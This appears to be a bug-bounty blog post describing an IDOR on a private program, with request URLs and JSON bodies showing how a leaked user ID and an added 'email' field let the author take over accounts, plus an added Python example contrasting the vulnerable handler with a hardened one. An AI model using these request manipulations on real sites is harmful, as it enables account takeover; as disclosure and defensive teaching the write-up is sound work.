IDOR — Account Takeover

Saad Ahmed
2 min read · Jun 14, 2019

Hi Guys,

After a long time I decided to share some of my findings and contribute to this awesome community. This write-up is all about an IDOR that I found in a private program I have been hunting on for the past year.

So there is a request that updates the account username, `https://www.site/dataentities/CL/documents/0e84b3b2-c65f-11e8-822e-0edf00549f0a`, which contains the following data: `{"firstName":"john","lastName":"account","document":"32132132132","birthDate":"2019-05-30T00:00:00","gender":"male","homePhone":"1000000000"}`

So I noticed that `0e84b3b2-c65f-11e8-822e-0edf00549f0a` is the user ID. I created another account, replaced the ID with the other account's, and was able to change the first and last name of my second account. But the USER-ID is hard to guess. After spending a lot of time crawling the web app, I noticed that there is a request the web app sends to the server just to verify whether an email is registered or not. The request looks like this: `https://www.site.com/site/dataentities/CL/search/?email=attacker@gmail.com`, and the response looks like this: `[{"email":"attacker@gmail.com","id":"0e84b3b2-c65f-11e8-822e-0edf00549f0a"}]`, so the USER-ID problem is solved :D

I tried to dig more and tried to change the email. I noticed that the input field code is `<input type="email" name="email" value="attacker@gmail.com" />`, so in the update-account-details request this is the JSON data sent to the server: `{"firstName":"john","lastName":"account","document":"32132132132","birthDate":"2019-05-30T00:00:00","gender":"male","homePhone":"1000000000"}`. I added the email param and value so that the JSON data looked like this: `{"firstName":"john","lastName":"account","document":"32132132132","birthDate":"2019-05-30T00:00:00","gender":"male","homePhone":"1000000000","email":"attacker2@gmail.com"}`, and boom, I was able to change anyone's email, which leads to Account Takeover.
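The two server-side mistakes behind this finding are an update endpoint that trusts the document ID in the URL without checking who owns it, and a handler that applies every JSON key it receives (so an uninvited `email` field gets written). The following is an added example written for this post, not the program's code: a small in-memory model of the update and email-lookup endpoints with a deliberately unchecked version beside a hardened one. The store layout, the `make_store` helper, the function names, and the `ALLOWED_FIELDS` allow-list are all assumptions; the profile keys mirror the JSON shown above.

```python
"""Added example, not the original post's or the target site's code.

Models the 'update account' endpoint and the email lookup from the write-up
and contrasts the unchecked handler with one that applies the two checks
whose absence produced the IDOR and the email takeover:
  1. the document being updated must belong to the authenticated user;
  2. only an allow-list of profile fields may be written, so an
     unexpected "email" key is rejected instead of silently applied.
Store layout, helper names and the allow-list are assumptions.
"""
from typing import Dict, Tuple

# Fields the profile form is meant to edit (assumed; mirrors the post's JSON).
# "email" is intentionally absent: changing it needs its own verified flow.
ALLOWED_FIELDS = {"firstName", "lastName", "document", "birthDate", "gender", "homePhone"}


def make_store() -> Dict[str, dict]:
    """Constructed sample data: document id -> record with its owner's user id."""
    return {
        "doc-a": {"owner": "user-a", "firstName": "john", "lastName": "account",
                  "email": "attacker@gmail.com"},
        "doc-b": {"owner": "user-b", "firstName": "victim", "lastName": "user",
                  "email": "victim@example.com"},
    }


def update_document_vulnerable(store: Dict[str, dict], session_user: str,
                               doc_id: str, body: dict) -> Tuple[int, dict]:
    """The failing pattern: the session user is never consulted and every
    key in the body is written to the record (IDOR + mass assignment)."""
    record = store.get(doc_id)
    if record is None:
        return 404, {"error": "not found"}
    record.update(body)
    return 200, {"id": doc_id}


def update_document(store: Dict[str, dict], session_user: str,
                    doc_id: str, body: dict) -> Tuple[int, dict]:
    """Hardened handler for PATCH /dataentities/CL/documents/<doc_id>.
    Returns (http_status, json_response)."""
    record = store.get(doc_id)
    # Same 404 for unknown and foreign ids, so the response does not reveal
    # whether a guessed id exists.
    if record is None or record.get("owner") != session_user:
        return 404, {"error": "not found"}
    if not isinstance(body, dict):
        return 400, {"error": "body must be a JSON object"}
    unexpected = set(body) - ALLOWED_FIELDS
    if unexpected:
        # Reject rather than silently drop, so the client (and the logs)
        # see that an unsupported field was attempted.
        return 400, {"error": "unexpected fields", "fields": sorted(unexpected)}
    record.update(body)
    visible = {k: record[k] for k in sorted(ALLOWED_FIELDS) if k in record}
    return 200, {"id": doc_id, **visible}


def check_email_registered(store: Dict[str, dict], email: str) -> dict:
    """Lookup that answers only the question the client asked.
    It never returns the owner's document id, which is what let the post's
    author turn an email address into a usable identifier.  (Whether the
    address is registered is still disclosed; rate limiting or a generic
    answer would close that too, which is outside this example.)"""
    registered = any(r.get("email", "").lower() == email.lower() for r in store.values())
    return {"registered": registered}


if __name__ == "__main__":
    s = make_store()
    print(update_document(s, "user-a", "doc-b", {"firstName": "x"}))          # 404
    print(update_document(s, "user-a", "doc-a", {"email": "attacker2@gmail.com"}))  # 400
    print(update_document(s, "user-a", "doc-a", {"firstName": "jane"}))       # 200
    print(check_email_registered(s, "victim@example.com"))                    # no id leaked
```

The ownership check is the IDOR fix; the allow-list is what stops the extra `email` key from landing in the record. Keeping both in the handler rather than in the client-side form is the point, since the form is exactly what the author edited.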

Without wasting time I wrote a good report and reported it to the team, and this is the response that I got from

and after some time the analyst came

Lesson: Always try harder :D Hope you like it.

./LOGOUT
